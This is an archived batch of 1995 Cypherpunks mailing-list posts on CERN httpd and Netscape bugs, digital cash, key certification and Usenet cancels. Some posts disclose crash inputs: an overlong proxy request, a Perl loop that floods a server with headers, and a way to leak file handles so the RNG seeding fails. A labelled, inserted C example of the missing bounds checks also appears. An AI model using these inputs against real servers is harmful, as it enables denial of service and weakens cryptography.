I don't think you are going to get a shirt. It's hard to mail one
to an anonymous person. On the other hand, they are not mine to
give or withhold.

PK
--
Philip L. Karlton			karlton@netscape.com
Principal Curmudgeon			http://www.netscape.com/people/karlton
Netscape Communications Corporation




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Sat, 7 Oct 95 22:53:45 PDT
To: cypherpunks@toad.com
Subject: Two bugs in CERN3.0 HTTPD
Message-ID: <199510080553.BAA29494@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



I have not verified whether or not both of these are security holes yet, 
but the first one is very probably a security hole.


1) overlong domain bug in Proxy mode
Symptom: send a proxy request to the server, for instance
GET http://overlongdomain HTTP/1.0

  This is the same bug that's in Netscape 1.1. The domain buffer
is a 256 byte buffer declared on the stack. (char host[256])

2) too many headers from CGI script
Symptom: HTScript.c allocates an array of pointers to char on the stack. This
array has size 100. The loop where they parse the output of a CGI script
is not bounds checked.  To crash the server, create a CGI script that
outputs a large number of headers before the document body.
(I simply made a perl script that did for($i=0; $i<1000; $i++) { 
  print "Header$i: $i\n"; }) Although this bug can coredump the process
servicing the request, I doubt it is exploitable. All that happens is 
an unchecked header_line[header_index++]=malloc(some space) gets executed.
In the worst case, you overwrite the stack with excessive malloc pointers.
You may be able to cause a foreign server to crash by having your own fake
server return the exploit, and then getting the foreign server to
read the headers by issuing a proxy request to your server.

Suffice it to say, the CERN code is *littered* with temporary local
stack arrays, and I'm guessing that many of them have faulty bounds
checking (or none at all)

-Ray
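
The two bounds checks the post above says are missing, written out as an added example; this is not code from the post or from the CERN httpd sources. Only `host[256]`, the array size of 100 and `header_line[header_index++]` come from the post; the function names, result codes and constructed inputs are assumptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_HEADERS 100  /* pointer-array size stated in the post */
#define HOST_BUF    256  /* char host[256], as stated in the post */

/* Result codes: hypothetical names for this example. */
enum { PARSE_OK = 0, PARSE_BAD = -1, PARSE_TOO_LONG = -2,
       PARSE_TOO_MANY = -3, PARSE_NOMEM = -4 };

/* Copy the host of a proxy URL ("http://host[:port]/path") into a fixed
 * buffer. An overlong host is rejected; it is never copied or truncated. */
int extract_proxy_host(const char *url, char *host, size_t host_size)
{
    size_t len;
    if (!url || !host || host_size == 0) return PARSE_BAD;
    if (strncmp(url, "http://", 7) != 0) return PARSE_BAD;
    len = strcspn(url + 7, ":/ \t\r\n");  /* host ends at port, path, space */
    if (len == 0) return PARSE_BAD;
    if (len >= host_size) return PARSE_TOO_LONG;  /* keep room for the NUL */
    memcpy(host, url + 7, len);
    host[len] = '\0';
    return PARSE_OK;
}

static void free_headers(char *header_line[], size_t n)
{
    while (n > 0) free(header_line[--n]);
}

/* Split CGI output into header lines up to the blank line ending the header
 * section. The index is checked before each store; on overflow all is freed. */
int collect_headers(const char *out, char *header_line[], size_t max,
                    size_t *count)
{
    size_t header_index = 0;
    int rc = PARSE_OK;
    *count = 0;
    while (*out != '\0' && *out != '\n' && *out != '\r') {
        size_t len = strcspn(out, "\r\n");
        char *copy;
        if (header_index >= max) { rc = PARSE_TOO_MANY; break; }
        copy = malloc(len + 1);
        if (!copy) { rc = PARSE_NOMEM; break; }
        memcpy(copy, out, len);
        copy[len] = '\0';
        header_line[header_index++] = copy;
        out += len;
        if (*out == '\r') out++;
        if (*out == '\n') out++;
    }
    if (rc != PARSE_OK) { free_headers(header_line, header_index); return rc; }
    *count = header_index;
    return PARSE_OK;
}

/* Constructed input: n lines "Header<i>: <i>", a blank line and a body,
 * the shape of output the Perl loop in the post produces. Caller frees. */
char *make_cgi_output(int n)
{
    size_t cap = (size_t)n * 32 + 16, used = 0;
    char *buf = malloc(cap);
    for (int i = 0; buf && i < n; i++)
        used += (size_t)snprintf(buf + used, cap - used, "Header%d: %d\n", i, i);
    if (buf) snprintf(buf + used, cap - used, "\nbody\n");
    return buf;
}

/* Parse n constructed headers: count stored, or a negative result code. */
int try_headers(int n)
{
    char *header_line[MAX_HEADERS], *out = make_cgi_output(n);
    size_t count = 0;
    int rc = out ? collect_headers(out, header_line, MAX_HEADERS, &count)
                 : PARSE_NOMEM;
    if (rc == PARSE_OK) free_headers(header_line, count);
    free(out);
    return rc == PARSE_OK ? (int)count : rc;
}

/* Build "http://" + n times 'a' + "/" and run extract_proxy_host on it. */
int try_host(size_t n)
{
    char host[HOST_BUF], url[1024];
    if (n > sizeof url - 9) return PARSE_BAD;
    memcpy(url, "http://", 7);
    memset(url + 7, 'a', n);
    memcpy(url + 7 + n, "/", 2);
    return extract_proxy_host(url, host, sizeof host);
}

int main(void)
{
    printf("host of 255/256 bytes: %d %d\n", try_host(255), try_host(256));
    printf("100/1000 headers: %d %d\n", try_headers(100), try_headers(1000));
    return 0;
}
```

Both functions refuse oversized input outright instead of truncating it, so a request or CGI response that exceeds the fixed sizes fails visibly and can be logged.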



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ogre@brainlink.com (Ron Hansen)
Date: Sat, 7 Oct 95 19:21:32 PDT
To: cypherpunks@toad.com
Subject: VCRplus code Algorithm
Message-ID: <199510080223.WAA13966@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


I've been trying (without success) to crack the encryption scheme that
Gemstar uses in its VCRplus codes.  I have written a TV/cable show
management system that generates plus codes for half-hour boundary shows
(ie 4 to 6 digit codes).  I can't seem to find anything on 7 and 8 digit
codes which handle 5 minute increments for program start time and
length.

(And yes, I have the article "Decoding a VCR Controller Code" by Ken
Shirriff, Curt Welch and Andrew Kinsman.  It was published in
Cryptologia.  Unfortunately, they didn't get beyond 6 digits either.)

BTW, this is strictly for my own use.  I'm just tired of approximating
shows and also a bug that I have that occasionally gives incorrect
results (I think it may be a leading zero being trimmed by the math
formulas).

Can anyone help?







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Purshottam <andy@acgeas.com>
Date: Sun, 8 Oct 95 02:36:19 PDT
To: cypherpunks@toad.com
Subject: netscape mail starts java attachments upon get new mail...
Message-ID: <199510080937.CAA17576@bibimbap.acgeas.com>
MIME-Version: 1.0
Content-Type: text/plain


The new netscape mail reader is quite nice, but a little too
automatic for my tastes. If one mails a java applet as an
attachment, doing "Get New Mail" with the mailed document
as the next message, automatically starts the applet in your mail
display. Of course, the wonderful Java security mechanism is
protecting you. 

Otherwise the java mail stuff is quite reasonable. I predict
it gains wide acceptance. 

Andy (andy@acgeas.com)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy <andy@acgeas.com>
Date: Sun, 8 Oct 95 02:39:27 PDT
To: cypherpunks@toad.com
Subject: Image Tape - view with Java enhanced Netscape mail reader
Message-ID: <30779C9D.3BA3@acgeas.com>
MIME-Version: 1.0
Content-Type: text/plain

http://www.javasoft.com/JDK-prebeta1/applets/ScrollingImages/example1.html

Title: Image Tape











The source.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Sun, 8 Oct 95 01:51:13 PDT
To: cypherpunks@toad.com
Subject: Netscape 2.0 beta
Message-ID: <199510080851.EAA13995@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



 Well, it's not mentioned on their home page yet, but I went to their ftp
site and I found that Netscape 2.0 beta was up there. For those wishing
to get their hands on Java, they don't support Java on the Mac or 
Linux/NetBSD/BSDI platforms yet. Only Win95/NT, IRIX, and Solaris/SunOS
are supported for Java. I knew it was too good to be true for them to have
ported Java to so many platforms so quickly.

  The good news is that someone finally, after years, has implemented
Progressive JPEG (I've been yelling about it for a while myself), and 
it is simply *light years* better than interlaced GIFs. 

-Ray




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an402976@anon.penet.fi (RingZero)
Date: Sun, 8 Oct 95 00:47:25 PDT
To: cypherpunks@toad.com
Subject: NEW Netscape RNG hole
Message-ID: <9510080732.AA14015@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



Did anyone else notice a bug in the new, public Netscape
RNG code? It appears that on Windows builds, during the
RNG seeding, the function that hashes in file contents
(EnumSystemFiles) doesn't close a file handle (lFileHandle).
This doesn't hurt too badly on the client, but on a server,
leaking these resources is deadly.

I ran some experiments. It took a few thousand calls before
these open file handles forced not only the file content function
to fail, but also made OTHER calls quietly fail. With these calls
quietly failing, the RNG is significantly weakened. In my tests
on Windows NT, ALL of the following RNG functions failed:

* GetComputerName
* GetVolumeInformation
	volume Name,
	volume Serial Number,
	Maximum Filename Length
	Filesystem Flags
	Filesystem Name
* GetDiskFreeSpace
	SectorsPerCluster
	BytesPerSector
	Free Clusters
	Total Clusters
* subroutine for the inclusion of system files, both number of them & contents
	ReadSystemFiles()
* subroutine used for other history file accesses
	SEC_FileForRNG(*filename)

How did this get past Netscape testers? Does anyone
know if this was fixed before Netscape shipped? Does
it rate a shirt, or does this mean  Jeff W. gets to shave his
head? I seem to remember him promising to shave it if we
could show a significant weakness in the new RNG code,
and since this does (IMO)...


On another note, has anyone noticed the 73 (!!!) or so
handles that are leaked by simply opening and closing
&Options -> &Preferences... ? Looks like somebody had a
problem coding the tabbed dialog.


RingZero

--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Sun, 8 Oct 95 08:44:04 PDT
To: aba@atlas.ex.ac.uk
Subject: Re: cypherpunks digicash bank?
Message-ID: <v02120d00ac9daa196797@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



Adam --

I'm afraid you may have somewhat misunderstood the motivation
behind the Identity Agnostic paper. In no way is it intended as
a way of not facing the music wrt regulators in the country(s) where
such an institution has offices. The IA approach is intended as
a possible alternative for an institution that might otherwise
license from Chaum.

The regulators I've discussed this with are primarily concerned
with how money moves into and out of a digital cash system. The
fact that small payments cannot be traced from buyer to seller is
not at the top of their list of concerns -- it's already a basic
fact of life for them in existing payment systems. They are also
not oblivious to the privacy concerns inherent in an institution
logging massive amounts of counterparty data about small transactions.

I would strongly discourage anyone from trying to set up a garage-
type operation. While regulators clearly don't appreciate the
subtleties of this stuff, they can spot an illegal bank or an
unlicensed money transmitter from a mile away.

If your concern is creating account anonymity, then you're going
to need to set up outside of the US. Do be aware that even the more
relaxed countries of the world have regulations that cover this
sort of thing, and they are especially interested in making sure
you at least pay the appropriate licensing fees.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 8 Oct 95 06:07:58 PDT
To: cypherpunks@toad.com
Subject: FOR_who
Message-ID: <199510081307.JAA23047@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   10-8-95. NYPaper:


   "Foreign Policy 3.1. Microsoft as World Power." [Foreign
   affairs column]

      Does Microsoft have a foreign policy? Mr. Ballmer says
      Microsoft doesn't have a foreign policy per se. But it
      does have a global business agenda. Since Microsoft
      today has twice the market value of General Motors, it's
      worth looking at that agenda because it is bound to
      influence U.S. foreign policy. Microsoft doesn't need
      Washington to open doors for it because foreign
      governments are begging Microsoft to come in and
      translate Windows 95 into their languages, so they can
      get on the information highway. Describing his contacts
      with foreign leaders, Mr. Ballmer put it this way:
      "People say, 'You have this technology. We hear it's
      changing the world. Tell us how it can help us.' "


   10-7-95. The Econofog:

   "The myth of the powerless state." [lead for a superb 40-
   page survey of the world economy]

      The increasing "globalisation" of the world economy is
      a fact, and one that nobody can ignore. To many,
      however, one aspect of this change is especially
      important: its effect on "economic sovereignty". They
      claim that global integration is emasculating the modern
      state. If the number of believers is any guide, these
      views are appealing. Yet the new orthodoxy is wrong. The
      world has changed, the global economy has indeed
      arrived: nonetheless, the emasculated state is a myth.


   Micro and Macro: FOR_who  (19 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sun, 8 Oct 95 10:23:23 PDT
To: cypherpunks@toad.com
Subject: Re: MITM attacks and True Names (again...)
In-Reply-To: <199510080515.WAA13191@ix5.ix.netcom.com>
Message-ID: <199510081722.KAA10011@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


One of the reasons people don't like solutions based on True Names is
because nyms don't have them.  Pr0duct Cypher can't very well go to
someone, show a drivers license, and get his key signed.

There is still a way in which signed, true-name-based keys can be useful
to nyms.  Maybe they can't get their own keys signed in this mode, but
they can check the keys of others.

If Pr0duct Cypher, under his secret identity, goes out and gets valid
keys that he can trust (maybe he sees Verisign's key fingerprint in the
newspaper), then if I send him my key signed by someone he trusts, he
can check the signature.  He can then send data to me encrypted with my
actual key, and the MITM can't do anything about it.  So the presence
of my True Name based key allows us to communicate securely.

This doesn't help for the case of two nyms who want to communicate,
though.  For that we do need a mode in which nyms can get their keys
signed.  I do think that there are some situations in which that is
plausible, based on the difficulty of mounting a MITM attack against
someone who is determined to try to detect it.  In the most extreme case
the MITM has to simulate the whole outside world with respect to the
person he is targeting, which is infeasible.  Various tricks like
sending hashes of future messages have been discussed; the MITM can't let
these through since the future message may include the true key that he
is hiding.  If people are then supposed to reply to these hashes, all of
the replies have to be simulated by the MITM.  Eventually it seems that
the MITM becomes enmeshed so deeply in his own lies that he would get
caught.  If steps like these are taken successfully it should be
reasonable to sign a nym's key, with the semantics being that either this
is the real key of the sender, or he has a nearly omnipotent MITM
surrounding him.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sun, 8 Oct 95 10:27:46 PDT
To: cypherpunks@toad.com
Subject: Re: Certification Authorities in history.
In-Reply-To: <199510080718.AAA02155@ix5.ix.netcom.com>
Message-ID: <199510081726.KAA10621@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


One key to rule them all;
One key to find them;
One key to bring them all
And in the darkness bind them.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bob Bruen, MIT Lab for Nuclear Science" <BRUEN@mitlns.mit.edu>
Date: Sun, 8 Oct 95 07:49:13 PDT
To: cypherpunks@toad.com
Subject: Boston Globe article
Message-ID: <951008104657.44605479@mitlns.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



 The Boston Sunday Globe Business section has an article by Jon Auerbach
entitled Cypherpunks with a picture of Carl Ellison and one of Ian Goldberg
and David Wagner. It stresses privacy, anarchy and the fears of the FBI.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nyuan@husc.harvard.edu (Nina Yuan)
Date: Sun, 8 Oct 95 08:08:42 PDT
To: cypherpunks@toad.com
Subject: Cypherpunks in the Boston Globe
Message-ID: <199510081508.LAA22962@fas.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


"Cypherpunks: In pursuit of privacy they break codes, fault government
plans" by Jon Auerbach is on the front page of the business section of
today's Boston Globe.  It leads with a paragraph on Carl Ellison,
along with a picture captioned with his quote "We have privacy in the
real world."  Aside from a few minor inaccuracies and simplifications,
it seems like a very balanced, cypher-favorable article.

-nhy
---------------------------------------------------------------------------
Nina H. Yuan    yuan@wjh.harvard.edu   nyuan@fas.harvard.edu  nyuan@bbn.com
"Education is a progressive discovery of our own ignorance."  - Will Durant
---------------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 8 Oct 95 11:15:02 PDT
To: Hal <cypherpunks@toad.com
Subject: Re: Certification Authorities in history.
Message-ID: <199510081814.LAA16455@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:26 AM 10/8/95 -0700, Hal wrote:
> One key to rule them all;
> One key to find them;
> One key to bring them all
> And in the darkness bind them.


A more famous statement on key certification authorities:

    And he causeth all, both small and great, rich and poor,
    free and bond, to receive a mark on their right hand, or
    in their foreheads:
    And that no man might buy or sell, save he that had the
    mark, or the name of the beast, or the number of his name.

Coming soon: True names neatly linked to your social insecurity
number

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Sun, 8 Oct 95 10:15:07 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape 2.0 beta
Message-ID: <199510081721.MAA06165@arnet.arn.net>
MIME-Version: 1.0
Content-Type: text/plain


Even nicer would be if the Windows beta included *all* the files needed. The
setup routine wants to install some OLE2 .dll's, but they don't seem to be
included with the compressed file, or even on the Netscape site. I was able
to work around it, since I already had the OLE2 stuff on my machine, and
edited the installation scripts and such - other folks aren't likely to be
as 'lucky'.

I suspect that Netscape is going to be hearing about that little oversight.....

Dave Merriman
This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geopages.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jgrubs@left.webcasters.com (Jim Grubs (W8GRT))
Date: Sun, 8 Oct 95 10:53:09 PDT
To: cypherpunks@toad.com
Subject: Kerserver keyrings
Message-ID: <X7yNcD1w165w@left.webcasters.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

"Jim Grubs (W8GRT)" <jgrubs@webcasters.com> writes:

> -- [ From: Jim Grubs (W8GRT) * EMC.Ver #2.5.02 ] --
>  Attachment: mailsig Code: 0006727      \ Created: 10-03-95, 07:16 PM [1 Kb]
> 
> Someone at Uni-Hamburg must have seen my message and said, "Oops, who turned
> that off?" Anyway, their keyring was updated today. It's 6.4 megs!!!! (My
> first HD was only 10.)
> 

Apologies to all for the mite in E-Mail Connection that caused it to think my
.sig was an attachment. Needless to say, I have purged my system of it...


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: LIBERTY!! Use it or lose it!!

iQCVAwUBMHgO7t74r4kaz3mVAQGPOwP9HLmDUXzv6FHyWUwIiK+kGQkm2f/wS6+C
snRmcyuzUK1bYk/xKleq1bdwGo1p6WfkdonAKYlV2sQIfx5smMlwtVqyKCJ8PJZJ
EnNhT9i47x0/oF9qta0O225LRGKEFgMswaqAZoRbrwWk1wwDQy1Be1GdUnUMxCTt
Ss8yYdV5p4o=
=8fAh
-----END PGP SIGNATURE-----

--
                        WebCasters(tm)
James C. Grubs                             jgrubs@webcasters.com
6817 Maplewood Avenue                         Tel.: 419-882-2697
Sylvania, Oh 43560                             Fax: 419-885-2814
  Internet consulting, HTML programming, Information brokering
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Christopher J. Shaulis" <cjs@netcom.com>
Date: Sun, 8 Oct 95 12:18:02 PDT
To: cypherpunks@toad.com
Subject: [NOISE] Caution! Netscape 2.0 and Linux
Message-ID: <199510081807.OAA00500@hoopsnake.cjs.net>
MIME-Version: 1.0
Content-Type: text


Hi all.

Just a warning to steer clear of Netscape 2.0 on Linux. It can't
resolve FQDNs, it's distributed as a statically linked a.out binary
*AGAIN*, and I'm hearing lots of reports sitting here on IRC that it
locks up R6 versions of XFree solid on a random basis. Not to mention
that there is no java support yet for Linux, and the Java support in
the Sun/Windows version of netscape is based on the new (and
incompatible with earlier versions) beta version of Java which sun
pimped out to Netscape and won't release the source code to.

The part about not resolving FQDNs might be an undocumented
feature. The most secure transaction is one that doesn't take place at
all. ;)

Have fun,
Christopher



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Sun, 8 Oct 95 14:17:18 PDT
To: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Subject: Re: Revised CJR
In-Reply-To: <Pine.ULT.3.91.951007163815.16906B-100000@krypton.mankato.msus.edu>
Message-ID: <199510082116.OAA03717@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


> On Fri, 6 Oct 1995, Raph Levien wrote:
> 
> > SPECIAL CHARACTERISTICS
> > 
> > There are no military standards or specifications that this t-shirt is
> > designed to meet. There are no special characteristics of the t-shirt,
> > including no radiation-hardening, no ballistic protection, no hard
>             ^^^^^^^^^^^^^^^^^^^^^^  ^^^^^^^^^^^^^^^^^^^^^^^  ^^^^^^^
> > points (the t-shirt is only available in soft 100% cotton), no TEMPEST
>   ^^^^^^  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> > capability, no thermal and no infrared signature reduction capability
> > (in excess of that provided by a typical black cotton t-shirt), no
> > surveillance, and no intelligence gathering capability. The t-shirt
> > does not use image intensification tubes.
> 
> Oh I love it.  A warm kudo for whoever came up with the above wording (as
> well as the rest of the paragraph). :-)

Thanks! Actually, I adapted the wording from Phil Karn's CJR for the
Applied Cryptography book.

I didn't find the time yesterday to send the CJR (instead, I was preparing
for a rather cpunks-friendly presentation on Net (In)security to a graduate
Business Administration class here at Berkeley for Tuesday). The revised
target ship date is Wednesday.

Raph





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Sun, 8 Oct 95 14:20:40 PDT
To: Cypherpunks <cypherpunks@toad.com>
Subject: anonymous cash without blinding
Message-ID: <Pine.SUN.3.91.951008135715.1544C-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


With all this talk about Chaum patents, I would like to remind people
that blind signatures are not absolutely essential to an anonymous 
digital cash system.  You can combine a traceable cash system with an 
anonymous communication system in a fairly obvious way to get a 
fully (both payer and payee) anonymous cash system.

Suppose a bank is running a digital cash system that works like this: it 
maintains a database of valid coins, and whenever someone presents it 
with a valid coin (string of bytes) it erases that coin from its 
database, and then either gives the person an equivalent amount of paper
cash or a newly created coin(s) of the same value.

Now if the bank allows this exchange of old coins for new coins to be 
done over an anonymous network (e.g., a remailer-net), then the system is 
anonymous as long as you don't move physical money in or out of the system.
Maintaining anonymity when moving physical money in and out of the system is 
what blinding helps you to do, but this will be less useful in a fully 
digital economy where such movement will be infrequent.

Wei Dai




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Sun, 8 Oct 95 07:53:22 PDT
To: cman@communities.com
Subject: Re: cypherpunks digicash bank?
In-Reply-To: <v02120d02ac9d1e825159@[199.2.22.120]>
Message-ID: <17968.9510081452@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Doug Barnes <cman@communities.com> writes on cpunks:
> I strongly recommend that anyone considering licensing from Chaum
> first read my paper on some interesting aspects of his basic blinding
> patent. The paper is at: http://www.communities.com/paper/agnostic.html

Yeah, I read that when it was first posted, a very interesting
approach.  And possibly a way to get around both regulations and
Chaum's patents.  It is a more anarchistic, less official approach, not
that I disagree with anarchistic approaches, or blowing off patents :-)

Just I got to thinking well what's $150k?  Not much perhaps if looked
at in the right way, a pittance compared to the kind of money the
likes of netscape are playing with.  And it buys some acceptability,
people do not need to obtain their anonymity after the fact, and
everyone uses the anonymous feature, rather than just cypherpunks
types.  I was thinking that the $150k might make all the difference to
the success of such a project, due to the privacy built-in as
standard.

> I will be putting up another short paper on anonymous currency
> management within the next few days.
> 
> Also, I strongly recommend that anyone serious about this not use the
> word "bank", 

you are right.

> and take the time to figure out how to structure the service as an
> NBFI (non-banking financial institution) and not a "bank".  Note
> that NBFIs are still regulated, and you will, at minimum, need to
> consult with your state banking regulators as well as the IRS (who
> also regulate money transmitters, i.e. issuers of traveller's
> checks, moneygrams, etc.) Note that the BSA (Bank _non_ Secrecy Act)
> does in fact apply to money transmitters, and you should be sure to
> educate yourself as to the implications of this.

Now this is the fatally weak point in my discussion, the political and
legal implications.  My only comment was to get legal opinion, and to
move the bank outside the US if this proved a problem.

I suspect the state banking regulators, and the IRS, would stomp on
the idea because they won't like the anonymity aspect, they would have
particular ease in doing this, particularly to a small group.

Even an identity agnostic bank (whoops must lose that 'bank' term
... 'agnostic payment system' perhaps:-) would have similar problems,
but at a later stage.  Aka you get your system nicely set up, have
some dastardly cypherpunks implement a way to hack your bank to get
anonymous payments (a complete surprise to yourself of course!).  Now
the regulators notice, and presumably make you change your bank code
to disable this possibility?

> I will be covering some aspects of these issues at length in my trip
> report on the anti-money-laundering conference I recently attended,
> which was a real eye-opener in a number of ways.

I will read with interest.

Three basic approaches I see:

1. go by the book, license the blinding stuff from Chaum, perhaps
agree to limits of $10k on individual transactions as in cash (that is
the limit in the US where you have to report cash transactions I
think?)

2. forget Chaum's patents with an agnostic server.  Problem is here
that it only provides anonymity for those happy to bend the rules, and
get 'blackmarket' cypherpunks technology which plugs and plays with
the bank.  Long term, this would be open to pressure from the banking
authorities, the IRS etc they would come and force you to do something
to close the loop hole.

3. Completely underground, anon remailers, decentralised cashing.

The problem as I see it is with options 2, and especially 3. you'd
have a job to get widespread acceptance, and adoption of blinded cash
as a payment system.


My previous post was based on 1.  The problems are still political and
legal, but less than with 3, and with anonymity for everyone as stated
aim, and hence not as readily removable by regulatory coercion of
the bank afterwards, leaving you with yet another non-anonymous
scheme.  My thought is that if you offered to restrict it to $10k
individual transactions (I know it sucks) then the similarity with
current physical cash is close, and there is little to complain about.
If it is payee anonymous only (you've got to start somewhere), there
is little opportunity for abuse of the type Freeh and co scream of,
paying hit men etc, as the hitman has to cash his money sometime, and
if it's unusually large, etc, it is the exact same situation as
ordinary cash.

They won't like it of course.  If it's too unpopular you could try say
Switzerland?  Some other banking haven?

What are your estimates of the palatability of the above to banking
regulator types?

The stuff about two versions of 100$ bills one for outside and one
inside the US a while back does not bode well for ecash payments with
*any* anonymity, but I think the above would be demonstrably hard to
use for nefarious purposes, and hard to go completely unaccountable.
(Modulo the proto coin tricks, and hijacked cash clients to force
others to do your cashing).

I reckon the recipient anonymity stuff, can be added after the fact by
people offering cashing services, cash is fluid, once you've got a
system set up.  Duncan Frissell had a nice sig to the effect of it
being hard to keep track of millions of private IP connected people,
all doing added services, such as providing anonymity.  At any event
the above system would be much preferable to the current offerings of
electronic cheques, electronic CC payments, and the lame ones which
claim privacy, but when examined turn out to be just private to the
extent that you trust a commercial bank to respect your privacy!
You've got to start somewhere, if this worked you could try for stage
2 later, fully anonymous, but at the moment there is *nothing*, and
there is surely a crying need for a decent ecash payment system.

Adam
--
#!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length($n)&~1)/2)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bogstad@news.cs.jhu.edu (Bill Bogstad)
Date: Sun, 8 Oct 95 09:00:25 PDT
To: cypherpunks@toad.com
Subject: Re: Rethinking the utility of netnews "cancel" control messages
In-Reply-To: <v02110105ac99c03922dd@[204.179.132.4]>
Message-ID: <458sie$r41@blaze.cs.jhu.edu>
MIME-Version: 1.0
Content-Type: text/plain


In article <v02110105ac99c03922dd@[204.179.132.4]>,
Erik E. Fair <fair@clock.org> wrote:
>At 9:50 10/5/95, Rich Salz wrote:
>>Cancel/Supercede is a useful model -- architecting them out of Usenet
>>is a very bad idea.  Ask Clarinet.
>
>Is it? The principal effects of not having the mechanism is a slightly
>higher disk storage requirement for netnews - something completely unheard
>of in the annals of USENET.
>
>The downsides of having the mechanism (especially unauthenticated) we see
>now: official and unofficial squelching of articles that someone doesn't
>like for whatever arbitrary or situational reason.

	There is another benefit to the current system which is being
ignored.  That is, it allows for the removal of unauthorized postings.
Posting of copyrighted materials without authorization does occur and I
think the current cancel mechanism (with its lack of authentication) is an
important safety valve for dealing with irate copyright holders.  I can't
say that the disadvantages of the current spoofable cancel system don't
outweigh this benefit, but I think that any system designed to replace it
should include this capability.  Someone asked the question if one was a
librarian/archivist would/should they honor cancels.  Under the circumstances
I describe, I think they have to do so.

	Rather than eliminate cancels, I think a general authentication
system for all USENET posts makes more sense.  The news system itself
doesn't need to authenticate general posts.  That can be left up to the
decision of the individual reader.  In most cases, I don't care as a news
reader if the real 'Erik Fair' posted this message.  It can stand on its own
merits.  In the case of cancels, as a news administrator I probably want to
restrict them to the original poster and a small set of authorized agents.
With new group and remove group messages, I probably want to only have a
small set of agents for the 'big seven' hierarchies and perhaps others.  I
see no downside to standardizing on a mechanism for including authentication
in news posts as long as we allow the user and site administrator to make
the decision about whether to pay attention to the authenticity of a
message.  Those who want the current system will set up the authentication
system to always say 'yes'.  Those who want to eliminate cancels can set up
the authentication module so it always says 'no'.  I would set up my system
somewhere in between these extremes.

				Bill Bogstad
				bogstad@cs.jhu.edu




